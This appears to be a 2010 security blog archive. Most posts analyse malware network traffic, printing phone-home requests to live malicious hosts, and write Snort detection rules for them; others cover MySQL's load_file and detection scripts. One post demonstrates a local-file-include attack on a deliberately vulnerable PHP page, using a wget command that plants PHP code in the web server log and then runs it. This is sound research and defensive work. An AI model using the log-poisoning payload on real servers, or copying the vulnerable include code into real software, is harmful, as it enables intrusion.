Friday, January 29, 2010

koko.exe Phone Home

koko.exe does a GET request to 193.242.108.49:

GET /Dialer_Min/number.asp HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 193.242.108.49
Connection: Keep-Alive


The server replies with a text file (a.b.c.d == my IP):

003727091384
US

a.b.c.d

1.8
test disclaimer

The URL and first line of the reply point to a phone number, so I polled the server to see how many phone numbers come back:

dennis@ipa:~$ for i in `seq 1 1 500`; do
> lynx -source http://193.242.108.49/Dialer_Min/number.asp | head -1 >> numbers
> done

dennis@ipa:~$ cat numbers | sort | uniq -c | sort -nr
73 0023222279883
61 01137165159890
54 01137091022348
50 01137165159892
50 003727091384
49 011239200167
47 00239200167
46 01123222279883
44 0037165159892
26 011438209216455

The phone numbers break down like this (international prefix, country calling code, national number):

011438209216455
011 - US (international direct dialling prefix)
43 - Austria (country calling code)
820 - services with regulated maximum tariffs
9216455

01137165159892
0037165159892
011/00 - US/generic international prefix
371 - Latvia
651 - landlines for the district of Aizkraukle
59892

01137165159890
011 - US
371 - Latvia
651 - landlines for the district of Aizkraukle
59890

01137091022348
011 - US
370 - Lithuania
910 - premium rate numbers
22348

011239200167
00239200167
011/00 - US/generic
239 - Sao Tome and Principe
239200167 - couldn't track down a source on the phone number format

01123222279883
0023222279883
011/00 - US/generic
232 - Sierra Leone
22279883 - couldn't track down a source on the phone number format

003727091384
00 - generic
372 - Estonia
709 - landline
1384
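The breakdown above is mechanical enough to script. The following Python is an added example, not part of the original post: it splits a dialed string into the international prefix (011 or 00), the E.164 country code and the national number, and tallies a list of numbers the way the sort | uniq -c | sort -nr pipeline did. The COUNTRY_CODES table is a constructed subset holding only the codes seen in this capture, and SAMPLE_NUMBERS is a constructed stand-in for the numbers file.

```python
"""Decode dialer phone-home numbers and tally them.

Added example; COUNTRY_CODES is a constructed subset covering only the
country codes that appeared in the capture, and SAMPLE_NUMBERS is a
constructed stand-in for the `numbers` file built by the polling loop."""
from collections import Counter

# International direct dialling prefixes seen in the replies:
# 011 (North American Numbering Plan) and 00 (ITU-recommended, most of the world).
IDD_PREFIXES = ("011", "00")

# E.164 country calling codes seen in the capture (constructed subset).
COUNTRY_CODES = {
    "43": "Austria",
    "232": "Sierra Leone",
    "239": "Sao Tome and Principe",
    "370": "Lithuania",
    "371": "Latvia",
    "372": "Estonia",
}


def decode_number(dialed):
    """Return (idd, country_code, national_number) for a dialed string,
    or None if it carries no known prefix or country code."""
    dialed = dialed.strip()
    if not dialed.isdigit():
        return None
    for idd in IDD_PREFIXES:
        if dialed.startswith(idd):
            rest = dialed[len(idd):]
            break
    else:
        return None
    # Country codes form a prefix code (1-3 digits), so longest-first
    # matching is unambiguous; a code missing from the table yields None.
    for length in (3, 2, 1):
        code = rest[:length]
        if code in COUNTRY_CODES:
            return idd, code, rest[length:]
    return None


def summarize(numbers):
    """Tally the numbers most-frequent-first and attach the decoded country,
    mirroring the `sort | uniq -c | sort -nr` step."""
    rows = []
    for number, count in Counter(n.strip() for n in numbers).most_common():
        decoded = decode_number(number)
        country = COUNTRY_CODES[decoded[1]] if decoded else "unknown"
        rows.append((count, number, country))
    return rows


# Constructed sample standing in for the `numbers` file.
SAMPLE_NUMBERS = [
    "0023222279883", "0023222279883", "011438209216455",
    "003727091384", "01137091022348", "0023222279883",
]

if __name__ == "__main__":
    for count, number, country in summarize(SAMPLE_NUMBERS):
        idd, code, national = decode_number(number)
        print(f"{count:3d} {number}  {idd}+{code} ({country}) {national}")
```

A number whose country code is not in the table decodes to None rather than being guessed, which is the behaviour you want when the table is deliberately partial.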

References:

Virustotal
ThreatExpert
CWSandbox

Wednesday, January 27, 2010

Friday, January 22, 2010

Snort Signature Practice: Setup_2022.exe

Setup_2022.exe resolves greatnorthwill.com (91.213.121.52) and calls home via a GET request:

GET /?mod=vv&i=1&id=2022 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: greatnorthwill.com
Cache-Control: no-cache

For the signature I used the parameter names and the User-Agent string:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"Setup_2022.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?mod="; uricontent:"&i="; uricontent:"&id="; content:"User-Agent\: Mozilla|0D 0A|"; sid:012220101;)

"mod" and "i" stayed static on the test runs.

References:

Virustotal
ThreatExpert

Thursday, January 7, 2010

MySQL's load_file Function

I didn't know about this function till I read http://praetorianprefect.com/archives/2009/12/unu-cracks-a-wall-street-journal-conference-site-not-wsj-com/.

dennis@ipa:~$ mysql -u root -h 192.168.1.102
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 17
Server version: 5.0.77-log OpenBSD port: mysql-server-5.0.77

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select load_file("/tmp/dennis")\G
*************************** 1. row ***************************
load_file("/tmp/dennis"): i'm a file on 192.168.1.102

1 row in set (0.00 sec)

Subject to the usual filesystem permissions and the MySQL FILE privilege, load_file() reads a file located on the database server and returns its contents as a string. It returns NULL rather than an error when the file does not exist, is not readable by all users on the server, is larger than max_allowed_packet, or (on servers where secure_file_priv is set) lies outside that directory, so a NULL result tells you little about which of those conditions failed.

Reference:

http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_load-file

Wednesday, January 6, 2010

Local File Include Code Execution

Based on http://eng.xakep.ru/link/50643/, I created a demo app to play with this. The vulnerable PHP code looks like:

<?php
$file = $_GET['id'];
echo $file;
if (file_exists($file))
    include $file;
?>

The following URL demonstrates a local file include:

http://192.168.1.102/animals/animals.php?id=../../../../etc/passwd

An attacker controls several fields of the log entries his own requests generate, and Apache writes the User-Agent header into access_log as received (a request URI, by contrast, is usually percent-encoded by the client before it is logged, which would mangle the PHP tags). For example, the -U flag to wget sets a custom User-Agent header:

wget -U "<?php system('touch /tmp/dennis'); ?>" 192.168.1.102

And it generates the following Apache access_log entry:

192.168.1.102 - - [06/Jan/2010:20:15:04 -0600] "GET / HTTP/1.0" 200 2212 "-" "<?php system('touch /tmp/dennis'); ?>"

If we request the following URL (the path to Apache's access_log varies per configuration):

http://192.168.1.102/animals/animals.php?id=../../../../var/www/logs/access_log

animals.php's include statement pulls in access_log, which now contains a log entry whose User-Agent is a snippet of attacker-controlled PHP code. PHP executes whatever sits between the <?php and ?> tags and treats the rest of the log as plain output, so the touch runs as the web server user. Two conditions apply: the log must be readable by that user, and the rest of the file must not contain a PHP parse error (a single malformed payload from an earlier attempt breaks the whole include until the log rotates). Both held here:

dennis@ipa:~$ ls -l /tmp/dennis
-rw-r--r-- 1 www wheel 0 Jan 6 20:26 /tmp/dennis
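Both halves of this attack leave traces in the same log that gets included. As an added example, not part of the original post, the following Python parses Apache combined-format access log lines and flags traversal sequences or sensitive file names in the request URI (the include step) and PHP open tags in the User-Agent or Referer (the poisoning step). The first sample line is the poisoned entry shown above; the other two lines, their IPs and the indicator names are constructed.

```python
"""Flag local file include attempts and log poisoning in Apache access logs.

Added example, not from the original post; the indicator names and the
sample lines other than the poisoned one are constructed."""
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Directory traversal, raw or percent-encoded, with either separator.
TRAVERSAL_RE = re.compile(r'\.\.(/|\\|%2f|%5c)', re.I)
# Files an LFI is typically pointed at: /etc/passwd to prove the bug,
# the web server's own logs to execute poisoned entries.
SENSITIVE_RE = re.compile(r'/etc/passwd|access_log|error_log', re.I)
# A PHP open tag in a client-supplied header is the poisoning payload itself.
PHP_TAG_RE = re.compile(r'<\?(php|=)?', re.I)


def analyze(line):
    """Return the indicators found in one combined-format log line
    (empty list for a clean line, None if the line does not parse)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group("request").split(" ")
    uri = parts[1] if len(parts) >= 2 else m.group("request")
    decoded = unquote(uri)  # catch %2e%2e%2f as well as literal ../
    hits = []
    if TRAVERSAL_RE.search(uri) or TRAVERSAL_RE.search(decoded):
        hits.append("traversal-in-uri")
    if SENSITIVE_RE.search(decoded):
        hits.append("sensitive-path-in-uri")
    if PHP_TAG_RE.search(m.group("agent")):
        hits.append("php-code-in-user-agent")
    if PHP_TAG_RE.search(m.group("referer")):
        hits.append("php-code-in-referer")
    return hits


def scan(lines):
    """Return (host, indicators) for every line that raised at least one flag."""
    results = []
    for line in lines:
        hits = analyze(line)
        if hits:
            results.append((LOG_RE.match(line).group("host"), hits))
    return results


# Line 1 is the poisoned entry from the post; lines 2-3 are constructed.
SAMPLE_LOG = [
    '''192.168.1.102 - - [06/Jan/2010:20:15:04 -0600] "GET / HTTP/1.0" 200 2212 "-" "<?php system('touch /tmp/dennis'); ?>"''',
    '''10.0.0.5 - - [06/Jan/2010:20:26:10 -0600] "GET /animals/animals.php?id=../../../../var/www/logs/access_log HTTP/1.1" 200 5123 "-" "Mozilla/5.0"''',
    '''10.0.0.6 - - [06/Jan/2010:20:30:00 -0600] "GET /animals/animals.php?id=cat.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"''',
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_LOG):
        print(host, ", ".join(hits))
```

The poisoning request on its own looks harmless (GET / with a 200), so the User-Agent check is what catches it; correlating a php-code-in-user-agent hit with a later traversal-in-uri request for the log path from any host is the pattern that indicates the attack went through.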

Sunday, January 3, 2010

Snort Signature Practice: A-Install-815416_2009-1939.exe

A-Install-815416_2009-1939.exe pops up an error window, phones home to needforspeedeu.com (91.213.121.52) and also tries resolving thebigben.cn:

GET /?act=fb&1=1&2=1262237847&3=5.1.2.0.2600&4=IEXPLORE.EXE&5=18&6=4&7=127&8=19&9=0&10=2009-1939 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: needforspeedeu.com
Cache-Control: no-cache

After comparing a few captures, the parameters change like this:

act=fb (same)
1=1 (same)
2= up to 10 digits (diff)
3=5.1.x.0 (diff)
4=IEXPLORE.EXE (same)
5= 2 digits (diff)
6= 1 digit (diff)
7= up to 3 digits (diff)
8= up to 3 digits (diff)
9=0 (same)
10= possible timestamp (diff)

My first signature tries to match the particulars of the parameters with a pcre:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?act=fb&1=1"; pcre:"/&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10=/"; sid:123120092;)

This didn't feel like a clean signature so I simplified it to:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware (simplified)"; flow:to_server; content:"GET"; http_method; uricontent:"/?act="; uricontent:"&1="; uricontent:"&2="; uricontent:"&3="; uricontent:"&4="; uricontent:"&5="; uricontent:"&6="; uricontent:"&7="; uricontent:"&8="; uricontent:"&9="; uricontent:"&10="; sid:010220101;)

References:

Virustotal
CWSandbox
ThreatExpert

Snort Signature Practice: spyeraser096.exe

spyeraser096.exe is one of those fake anti-virus programs. It does a GET request to spyeraser.ir (193.104.110.81):

GET /statav.php?wmid=3&name=a0331bb5faf7707f HTTP/1.1
Host: spyeraser.ir

I used the file and parameter names for the signature:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"spyeraser096.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/statav.php?wmid="; uricontent:"&name="; sid:010120101;)

References:

Virustotal
ThreatExpert

Snort Signature Practice: n-bss.exe

n-bss.exe does a GET phone home to gateshis.cn (91.213.174.9), then tries to download another n-bss.exe binary from blogcz.cn (which did not resolve):

GET /knock.php?id=SYSTEM!WINXP!B857B9C9 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gateshis.cn
Connection: Keep-Alive

knock.php's id parameter is delimited by "!". "SYSTEM" remained consistent on my packet captures--user name of the process? The next field is the computer's name. I'm not sure about the last field:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"n-bss.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/knock.php?id="; pcre:"/id=SYSTEM!.*!/"; sid:123120091;)

References:

Virustotal
ThreatExpert

Snort Signature Practice: logo.exe

logo.exe POSTs a base64 encoded file to gator.php on yourclicker.cn (124.217.251.182). It also resolves ya.ru (77.88.21.8, 213.180.204.8, 93.158.134.8), but I never saw any traffic to these IPs:

POST /gator.php HTTP/1.0
Host: yourclicker.cn
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 3088

a=&b=&d=&c=UDNNTAAAAAA/BwAAEQAAAAAAAAAIAAAAIyw9LCyblXsSAAAAAAAAABAAAADZBwwABAAfABcA
AgAiAPkBEwAAAAAAAACkAAAApAAAAAMAAAA1NTI3NC02NDEtMjM4Mjk1Ni0yMzg0NAAuAAAA
...more base64

I based the signature on the file name and POST parameter names--the out of order d and c parameters felt unique.

# distance:0 makes each parameter match relative to the end of the previous one,
# so the rule only fires when the parameters appear in the order a, b, d, c as in
# the capture; without it Snort searches each content independently and a body
# of "a=&b=&c=&d=" would match too.
alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"logo.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/gator.php"; content:"a="; content:"&b="; distance:0; content:"&d="; distance:0; content:"&c="; distance:0; sid:123120093;)

References:

Virustotal
ThreatExpert